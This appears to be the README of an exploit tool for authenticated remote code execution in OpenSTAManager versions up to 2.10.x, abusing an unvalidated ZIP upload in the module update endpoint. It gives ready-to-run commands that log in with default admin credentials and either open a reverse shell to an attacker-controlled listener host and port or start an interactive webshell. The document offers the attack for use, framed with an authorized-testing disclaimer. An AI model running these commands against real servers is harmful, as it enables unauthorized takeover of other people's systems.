
Authenticated remote code execution exploit for OpenSTAManager via unvalidated ZIP upload, providing reverse shell and interactive webshell capabilities for authorized penetration testing.
Authenticated RCE via unvalidated ZIP upload in the module update endpoint.
Affected: OpenSTAManager <= 2.10.x
pip install requests
# Reverse shell (Penelope or any listener)
python3 exploit.py -u http://TARGET -U admin -P admin --lhost 10.10.14.X --lport 4444
# Interactive webshell
python3 exploit.py -u http://TARGET -U admin -P admin --interactive
For authorized penetration testing and educational purposes only.